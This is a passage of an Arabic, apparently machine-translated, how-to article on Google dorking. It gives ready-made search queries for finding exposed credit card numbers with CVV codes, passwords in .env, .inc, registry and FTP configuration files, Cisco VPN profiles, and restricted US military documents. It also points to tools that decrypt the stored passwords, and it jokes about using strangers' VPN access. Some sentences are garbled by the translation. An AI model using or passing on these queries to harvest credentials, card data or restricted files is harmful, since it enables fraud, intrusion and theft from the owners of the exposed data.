نتيجة لذلك ، من خلال الأمر dorks google –d extension.txt –f bank ، من أول طلب يبدأ Google في إعطاء المواقع بامتدادات ملفات "غير عادية" (انظر الشكل 9).
الشكل 9 - البحث عن أنواع الملفات "السيئة" في المواقع المصرفية
يجب أن يؤخذ في الاعتبار أن google لا تقبل الطلبات التي تزيد عن 32 كلمة.
مع dorks google –d intext: "خطأ | تحذير | إشعار | بناء الجملة" - جامعة
يمكنك البحث عن أخطاء مترجم PHP في المواقع التعليمية (انظر الشكل 10).
الشكل 10 - ابحث عن أخطاء وقت تشغيل PHP
في بعض الأحيان ، ليس من المناسب استخدام فئة أو فئتين من الأحمق.
على سبيل المثال ، إذا كنت تعلم أن الموقع يعمل على محرك WordPress ، فأنت بحاجة إلى dorks لـ wordpress. في هذه الحالة ، من الملائم استخدام بحث قاعدة بيانات Google Hack. سيقوم الأمر dorks ghdb –q wordpress –o wordpress_dorks.txt بتنزيل جميع Wordpress dorks ، كما هو موضح في الشكل 11:
الشكل 11 - البحث عن dorks ذات الصلة وورد
دعنا نعود إلى البنوك مرة أخرى ونستخدم dorks google –D wordpress_dords.txt - أمر البنك لمحاولة العثور على شيء مثير للاهتمام يتعلق بـ wordpress (انظر الشكل 12).
الشكل 12 - البحث عن نقاط الضعف في Wordpress
من الجدير بالذكر أن البحث في قاعدة بيانات Google Hack لا يقبل كلمات أقصر من 4 أحرف. على سبيل المثال ، إذا كانت CMS للموقع غير معروفة ، ولكن اللغة معروفة - PHP. في هذه الحالة ، يمكنك تصفية ما تحتاجه يدويًا باستخدام الأنابيب وأداة البحث عن النظام dorks –c all | findstr / I php> php_dorks.txt (انظر الشكل 13):
الشكل 13 - البحث في جميع الأحمق حيث تم ذكر PHP
يجب البحث عن الثغرات الأمنية أو بعض المعلومات الحساسة في محرك البحث فقط إذا كان هناك فهرس مهم على هذا الموقع. على سبيل المثال ، إذا كان الموقع يحتوي على 10-15 صفحة مفهرسة ، فمن الغباء البحث عن شيء بهذه الطريقة. من السهل التحقق من حجم الفهرس - فقط أدخله في السلسلة بحث جوجل"الموقع: somesite.com". يظهر مثال على موقع غير مفهرس في الشكل 14.
الشكل 14 - التحقق من حجم فهرس الموقع
الآن حول الأشياء غير السارة ... قد تطلب Google من وقت لآخر رمز التحقق - لا يوجد شيء يمكن القيام به - سيتعين عليك إدخاله. على سبيل المثال ، عندما مررت بفئة "رسائل الخطأ" (90 dorks) ، سقطت كلمة التحقق مرة واحدة فقط.
وتجدر الإشارة إلى أن phantomjs يدعم أيضًا العمل من خلال وكيل ، من خلال واجهة http وواجهة socks. لتمكين وضع الوكيل ، قم بإلغاء التعليق عن السطر المقابل في dorks.bat أو dorks.sh.
الأداة متاحة ككود مصدر
الحصول على بيانات خاصة لا يعني دائمًا القرصنة - في بعض الأحيان يتم نشرها الوصول العام... ستسمح لك معرفة إعدادات Google والقليل من البراعة بالعثور على الكثير من الأشياء المثيرة للاهتمام - من أرقام بطاقات الائتمان إلى مستندات مكتب التحقيقات الفيدرالي.
اليوم ، كل شيء متصل بالإنترنت ، ولا يهتم كثيرًا بتقييد الوصول. لذلك ، تصبح الكثير من البيانات الخاصة فريسة لمحركات البحث. لم تعد الروبوتات العنكبوتية مقصورة على صفحات الويب ، بل تقوم بفهرسة كل المحتوى المتاح على الويب وإضافة المعلومات غير العامة باستمرار إلى قواعد بياناتها. من السهل اكتشاف هذه الأسرار - ما عليك سوى معرفة كيفية السؤال عنها بالضبط.
في الأيدي اليمنى ، ستجد Google بسرعة كل ما هو ضار على الويب - على سبيل المثال ، المعلومات الشخصية والملفات للاستخدام الرسمي. غالبًا ما تكون مخفية ، مثل مفتاح تحت السجادة: لا توجد قيود وصول حقيقية ، فالبيانات موجودة فقط في الفناء الخلفي للموقع ، حيث لا تؤدي الروابط. توفر واجهة الويب القياسية لـ Google فقط إعدادات البحث المتقدم الأساسية ، ولكن حتى تلك الإعدادات ستكون كافية.
يمكنك استخدام عاملين لتقييد بحثك على أنواع ملفات معينة على Google باستخدام نوع الملف والإضافات. الأول يحدد التنسيق الذي يحدده محرك البحث من خلال عنوان الملف ، والثاني - امتداد الملف ، بغض النظر عن محتواه الداخلي. عند البحث في كلتا الحالتين ، ما عليك سوى تحديد الامتداد. في البداية ، كان عامل التشغيل ext مناسبًا للاستخدام في الحالات التي لا يحتوي فيها الملف على ميزات تنسيق محددة (على سبيل المثال ، للبحث عن ملفات تكوين ini و cfg ، والتي يمكن أن يكون أي شيء بداخلها). الآن تغيرت خوارزميات Google ، ولا يوجد فرق واضح بين المشغلين - النتائج في معظم الحالات تظهر نفسها.
بشكل افتراضي ، يبحث Google عن الكلمات ، وبشكل عام ، أي أحرف تم إدخالها في جميع الملفات في الصفحات المفهرسة. يمكنك تحديد نطاق البحث حسب المجال افضل مستوى، موقع محدد أو موقع التسلسل المطلوب في الملفات نفسها. بالنسبة للخيارين الأولين ، يتم استخدام موقع المشغل ، متبوعًا باسم المجال أو الموقع المحدد. في الحالة الثالثة ، تسمح لك مجموعة كاملة من العوامل بالبحث عن المعلومات في حقول الخدمة والبيانات الوصفية. على سبيل المثال ، سيجد allinurl المحدد في نص الروابط نفسها ، allinanchor - في النص الذي يحتوي على العلامة ، allintitle - في عناوين الصفحات ، allintext - في نص الصفحات.
لكل مشغل نسخة خفيفة ذات اسم أقصر (بدون البادئة بالكامل). الفرق هو أن allinurl سيجد روابط بكل الكلمات ، بينما سيجد inurl روابط مع الأولى فقط. يمكن أن تظهر الكلمات الثانية والكلمات اللاحقة من الاستعلام في أي مكان على صفحات الويب. يختلف عامل inurl أيضًا عن عامل آخر مشابه في المعنى - الموقع. يسمح لك الأول أيضًا بالعثور على أي تسلسل للأحرف في رابط إلى المستند الذي تم البحث عنه (على سبيل المثال ، / cgi-bin /) ، والذي يستخدم على نطاق واسع للعثور على المكونات ذات الثغرات الأمنية المعروفة.
لنجربها عمليًا. نأخذ عامل التصفية allintext ونجعل الطلب يعيد قائمة بأرقام بطاقات الائتمان ورموز التحقق ، والتي ستنتهي صلاحيتها بعد عامين فقط (أو عندما يتعب أصحابها من إطعام الجميع على التوالي).
Allintext: تاريخ انتهاء صلاحية رقم البطاقة / 2017 cvv
عندما تقرأ في الأخبار أن متسللًا شابًا "اخترق خوادم" البنتاغون أو وكالة ناسا ، وسرقة معلومات سرية ، فإننا نتحدث في معظم الحالات عن مثل هذه التقنية الأساسية لاستخدام Google. لنفترض أننا مهتمون بقائمة موظفي ناسا وتفاصيل الاتصال بهم. بالتأكيد هناك مثل هذه القائمة في شكل إلكتروني. للراحة أو من خلال الإشراف ، يمكن العثور عليها أيضًا على موقع الويب الخاص بالمنظمة نفسها. من المنطقي في هذه الحالة عدم وجود روابط لها ، لأنها مخصصة للاستخدام الداخلي. ما هي الكلمات التي يمكن أن تكون في مثل هذا الملف؟ على الأقل - حقل "العنوان". اختبار كل هذه الافتراضات سهل.
Inurl: nasa.gov نوع الملف: xlsx "عنوان"
العثور على مثل هذه هو شيء صغير لطيف. يوفر الصيد القوي حقًا معرفة أكثر تفصيلاً بمشغلي Google لمشرفي المواقع ، والويب نفسه ، وهيكل ما يتم البحث عنه. بمعرفة التفاصيل ، يمكنك بسهولة تصفية النتائج وتحسين خصائص الملفات التي تحتاجها للحصول على بيانات قيمة حقًا في الباقي. من المضحك أن البيروقراطية تأتي للإنقاذ هنا. ينتج صيغًا قياسية تجعل البحث عن المعلومات السرية التي تم تسريبها عن طريق الخطأ في الويب أمرًا مناسبًا.
على سبيل المثال ، ختم بيان التوزيع ، وهو إلزامي في مكتب وزارة الدفاع الأمريكية ، يعني قيودًا معيارية على توزيع المستند. يشير الحرف أ إلى النشرات العامة التي لا يوجد فيها شيء سري ؛ B - للاستخدام الداخلي فقط ، C - سري للغاية ، وما إلى ذلك حتى F. بشكل منفصل ، هناك الحرف X ، الذي يشير إلى معلومات قيّمة بشكل خاص تمثل سر دولة على أعلى مستوى. دع هذه المستندات يتم البحث عنها من قبل أولئك الذين من المفترض أن يقوموا بذلك في الخدمة ، وسنقتصر على الملفات التي تحتوي على الحرف C. وفقًا لتوجيه DoDI 5230.24 ، يتم تعيين مثل هذه العلامات على المستندات التي تحتوي على وصف للتقنيات الهامة التي تأتي تحت مراقبة الصادرات. يمكن العثور على مثل هذه المعلومات شديدة الحراسة على مواقع في نطاق المستوى الأعلى .mil المخصص للجيش الأمريكي.
"بيان التوزيع ج" inurl: navy.mil
من المريح جدًا أن يحتوي نطاق .mil فقط على مواقع من وزارة الدفاع الأمريكية والمنظمات المتعاقد معها. نتائج البحث المقيدة بالمجال نظيفة بشكل استثنائي ، والعناوين تشرح نفسها بنفسها. من غير المجدي عمليًا البحث عن الأسرار الروسية بهذه الطريقة: تسود الفوضى في نطاقات .ru و.rf ، وتبدو أسماء العديد من أنظمة الأسلحة نباتية (PP "Cypress" أو ACS "Akatsiya") أو رائعة تمامًا (TOS ") بوراتينو ").
من خلال فحص أي مستند بعناية من موقع في نطاق .mil ، يمكنك رؤية محددات أخرى لتحسين البحث. على سبيل المثال ، إشارة إلى قيود التصدير "Sec 2751" ، والتي تعتبر ملائمة أيضًا للبحث عن معلومات فنية مثيرة للاهتمام. من وقت لآخر ، يتم سحبه من المواقع الرسمية ، حيث ظهر مرة واحدة ، لذلك إذا لم تتمكن من النقر فوق ارتباط مثير للاهتمام في نتائج البحث ، فاستخدم ذاكرة التخزين المؤقت لـ Google (ذاكرة التخزين المؤقت للمشغل) أو موقع أرشيف الإنترنت.
بالإضافة إلى المستندات الحكومية التي تم رفع السرية عنها عن طريق الخطأ ، فإن ذاكرة التخزين المؤقت لـ Google تنبثق أحيانًا روابط للملفات الشخصية من Dropbox وخدمات التخزين الأخرى التي تنشئ روابط "خاصة" للبيانات التي تم إصدارها علنًا. بل هو أسوأ مع الخدمات البديلة والمحلية. على سبيل المثال ، يبحث الطلب التالي عن البيانات من جميع عملاء Verizon الذين لديهم خادم FTP مثبتًا ومستخدمًا بشكل نشط على جهاز التوجيه الخاص بهم.
Allinurl: بروتوكول نقل الملفات: // verizon.net
يوجد الآن أكثر من أربعين ألف شخص أذكياء ، وفي ربيع عام 2015 كان هناك ترتيب من حيث الحجم أكبر. بدلاً من Verizon.net ، يمكنك استبدال اسم أي مزود معروف ، وكلما كان أكثر شهرة ، يمكن أن يكون المصيد أكبر. من خلال خادم FTP المدمج ، يمكنك رؤية الملفات الموجودة على وحدة التخزين الخارجية المتصلة بالموجه. عادةً ما يكون هذا NAS للعمل عن بُعد أو سحابة شخصية أو نوعًا من تنزيل ملفات نظير إلى نظير. تتم فهرسة جميع محتويات هذه الوسائط بواسطة Google ومحركات البحث الأخرى ، بحيث يمكنك الوصول إلى الملفات المخزنة على محركات أقراص خارجية باستخدام رابط مباشر.
قبل الترحيل على نطاق واسع إلى السحابة ، كانت خوادم FTP البسيطة ، والتي كانت تحتوي أيضًا على نقاط ضعف كافية ، تُحكم كمخازن بعيدة. لا يزال الكثير منهم ذا صلة اليوم. على سبيل المثال ، يقوم برنامج WS_FTP Professional الشهير بتخزين بيانات التكوين وحسابات المستخدمين وكلمات المرور في ملف ws_ftp.ini. من السهل العثور عليها وقراءتها حيث يتم تخزين جميع السجلات في نص عادي ويتم تشفير كلمات المرور باستخدام Triple DES بعد الحد الأدنى من التعتيم. في معظم الإصدارات ، يكفي تجاهل البايت الأول.
من السهل فك تشفير كلمات المرور هذه باستخدام الأداة المساعدة WS_FTP Password Decryptor أو خدمة ويب مجانية.
عند الحديث عن اختراق موقع تعسفي ، فعادة ما يعني ذلك الحصول على كلمة مرور من السجلات والنسخ الاحتياطية لملفات تكوين CMS أو تطبيقات التجارة الإلكترونية. إذا كنت تعرف هيكلها النموذجي ، فيمكنك بسهولة تحديد الكلمات الرئيسية. خطوط مثل تلك الموجودة في ws_ftp.ini شائعة للغاية. على سبيل المثال ، لدى Drupal و PrestaShop معرف مستخدم (UID) وكلمة مرور مقابلة (pwd) ، ويتم تخزين جميع المعلومات في ملفات بامتداد .inc. يمكنك البحث عنها على النحو التالي:
"pwd =" "UID =" ext: inc
في ملفات تكوين خوادم SQL ، الأسماء والعناوين بريد الالكترونييتم تخزين المستخدمين في نص واضح ، وتتم كتابة تجزئات MD5 الخاصة بهم بدلاً من كلمات المرور. بالمعنى الدقيق للكلمة ، من المستحيل فك تشفيرها ، ولكن يمكنك العثور على تطابق بين أزواج كلمة مرور التجزئة المعروفة.
حتى الآن ، هناك أنظمة DBMS لا تستخدم حتى تجزئة كلمة المرور. يمكن ببساطة عرض ملفات التكوين لأي منها في المتصفح.
Intext: نوع الملف DB_PASSWORD: env
مع قدوم خوادم Windowsتم أخذ مكان ملفات التكوين جزئيًا بواسطة التسجيل. يمكنك البحث من خلال فروعه بنفس الطريقة بالضبط ، باستخدام reg كنوع الملف. على سبيل المثال ، مثل هذا:
نوع الملف: reg HKEY_CURRENT_USER "كلمة المرور" =
في بعض الأحيان يكون من الممكن الوصول إلى المعلومات السرية بمساعدة البيانات التي تم فتحها عن طريق الخطأ وتم اكتشافها في مجال رؤية Google. من الناحية المثالية ، ابحث عن قائمة كلمات المرور ببعض التنسيقات الشائعة. قم بتخزين معلومات الحساب في ملف نصي أو مستند Word أو بريد إلكتروني جداول البيانات إكسلفقط الأشخاص اليائسون هم من يستطيعون ذلك ، ولكن هناك دائمًا ما يكفي منهم.
نوع الملف: xls inurl: password
من ناحية ، هناك العديد من الطرق لمنع مثل هذه الحوادث. من الضروري تحديد حقوق الوصول المناسبة في htaccess و patch CMS وعدم استخدام البرامج النصية الموجودة على اليسار وإغلاق الثغرات الأخرى. يوجد أيضًا ملف robots.txt يمنع محركات البحث من فهرسة الملفات والأدلة المحددة فيه. من ناحية أخرى ، إذا كانت بنية ملف robots.txt في بعض الخوادم تختلف عن البنية القياسية ، فيمكنك على الفور معرفة ما يحاولون إخفاءه عليه.
قائمة الدلائل والملفات الموجودة على أي موقع مسبوقة بفهرس قياسي لـ. نظرًا لأنه لأغراض الخدمة يجب أن يظهر في العنوان ، فمن المنطقي قصر بحثه على عامل التشغيل intitle. تم العثور على أشياء مثيرة للاهتمام في / admin / ، / personal / ، / etc / وحتى / سر / أدلة.
الأهمية هنا مهمة للغاية: يتم إغلاق نقاط الضعف القديمة ببطء شديد ، لكن Google ونتائج البحث الخاصة به تتغير باستمرار. حتى أن هناك فرقًا بين مرشح "آخر ثانية" (& tbs = qdr: s في نهاية عنوان url للطلب) و "الوقت الفعلي" (& tbs = qdr: 1).
الفاصل الزمني للتاريخ والوقت اخر تحديثملف من Google يشار إليه ضمنيًا أيضًا. من خلال واجهة الويب الرسومية ، يمكنك تحديد إحدى الفترات النموذجية (الساعة ، واليوم ، والأسبوع ، وما إلى ذلك) أو تعيين نطاق زمني ، ولكن هذه الطريقة غير مناسبة للأتمتة.
بالنظر شريط العنوانيمكنك فقط تخمين طريقة للحد من مخرجات النتائج باستخدام البناء & tbs = qdr :. الحرف y بعده يحدد الحد الأقصى لسنة واحدة (& tbs = qdr: y) ، يعرض m نتائج الشهر الماضي ، w للأسبوع ، d لليوم الماضي ، h للساعة الأخيرة ، n للدقيقة ، و s من أجل أعطني ثانية. تم العثور على أحدث النتائج التي تم إبلاغ Google بها للتو باستخدام مرشح & tbs = qdr: 1.
إذا كنت بحاجة إلى كتابة نص برمجي معقد ، فسيكون من المفيد معرفة أن النطاق الزمني تم تعيينه في Google بتنسيق Julian باستخدام عامل تشغيل daterange. على سبيل المثال ، هذه هي الطريقة التي يمكنك بها العثور على القائمة مستندات PDFمع كلمة سرية ، تم تحميلها من 1 يناير إلى 1 يوليو 2015.
نوع الملف السري: ملف pdf daterange: 2457024-2457205
النطاق محدد بتنسيق التاريخ اليوليوسي ، باستثناء الجزء الكسري. إن ترجمتها يدويًا من التقويم الغريغوري أمر غير مريح. من الأسهل استخدام محول التاريخ.
إلى جانب تحديد عوامل تشغيل إضافيةالخامس استعلام بحثيمكن إرسالها مباشرة في نص الرابط. على سبيل المثال ، نوع ملف التأهيل: pdf يتوافق مع البناء as_filetype = pdf. وبالتالي ، من الملائم تحديد أي توضيحات. لنفترض أن إرجاع النتائج فقط من جمهورية هندوراس محدد عن طريق إضافة بناء cr = countryHN إلى عنوان URL للبحث ، ومن مدينة Bobruisk - gcs = Bobruisk فقط. انظر قسم المطور للحصول على قائمة كاملة.
تهدف أدوات الأتمتة من Google إلى تسهيل الحياة ، لكنها غالبًا ما تضيف تحديات. على سبيل المثال ، يتم تحديد مدينة المستخدم بواسطة عنوان IP الخاص بالمستخدم عبر WHOIS. بناءً على هذه المعلومات ، لا يوازن Google الحمل بين الخوادم فحسب ، بل يغير أيضًا نتائج البحث. اعتمادًا على المنطقة ، لنفس الطلب ، ستحصل الصفحة الأولى على نتائج مختلفة ، وقد يكون بعضها مخفيًا تمامًا. لتشعر كأنك عالمي وللبحث عن معلومات من أي بلد ، سيساعدك الرمز المكون من حرفين بعد توجيه gl = country. على سبيل المثال ، رمز هولندا هو NL ، لكن الفاتيكان وكوريا الشمالية ليس لهما رمز خاص بهما على Google.
في كثير من الأحيان ، تزدحم نتائج البحث حتى بعد استخدام بعض الفلاتر المتقدمة. في هذه الحالة ، من السهل تنقيح الاستعلام عن طريق إضافة عدة كلمات استبعاد إليه (كل كلمة مسبوقة بعلامة ناقص). على سبيل المثال ، غالبًا ما يتم استخدام الخدمات المصرفية والأسماء والبرامج التعليمية مع كلمة شخصي. لذلك ، لن يتم عرض نتائج البحث الأنظف من خلال مثال كتاب مدرسي لاستعلام ، ولكن من خلال مثال محسّن:
Intitle: "فهرس / شخصي /" - الأسماء - البرنامج التعليمي - البنوك
يتميز المخترق المحنك بحقيقة أنه يوفر لنفسه كل ما يحتاجه بمفرده. على سبيل المثال ، تعد الشبكة الخاصة الافتراضية ملائمة ولكنها إما مكلفة أو مؤقتة ومحدودة. الاشتراك بمفردك مكلف للغاية. من الجيد وجود اشتراكات جماعية ، وبمساعدة Google ، من السهل أن تصبح جزءًا من مجموعة. للقيام بذلك ، ما عليك سوى العثور على ملف تكوين Cisco VPN ، الذي يحتوي على امتداد PCF غير قياسي إلى حد ما ومسار يمكن التعرف عليه: Program Files \ Cisco Systems \ VPN Client \ Profiles. طلب واحد ، وأنت تنضم ، على سبيل المثال ، إلى فريق العمل الودود في جامعة بون.
نوع الملف: pcf vpn OR Group
يتم تخزين كلمات المرور بشكل مشفر ، لكن موريس ماسارد كتب بالفعل برنامجًا لفك تشفيرها ويوفرها مجانًا من خلال thecampusgeeks.com.
في مساعدة جوجليتم إجراء مئات الأنواع المختلفة من الهجمات واختبارات الاختراق. هناك العديد من الخيارات التي تؤثر على البرامج الشائعة ، وتنسيقات قواعد البيانات الرئيسية ، ونقاط ضعف PHP المتعددة ، والسحاب ، وما إلى ذلك. إذا كنت تعرف بالضبط ما تبحث عنه ، فسيؤدي ذلك إلى تبسيط عملية الحصول عليه إلى حد كبير المعلومات التي تحتاجها(خاصة تلك التي لم يتم التخطيط لنشرها على الملأ). شودان ليس مصدرًا واحدًا للأفكار المثيرة للاهتمام ، ولكن كل قاعدة بيانات لموارد الشبكة المفهرسة!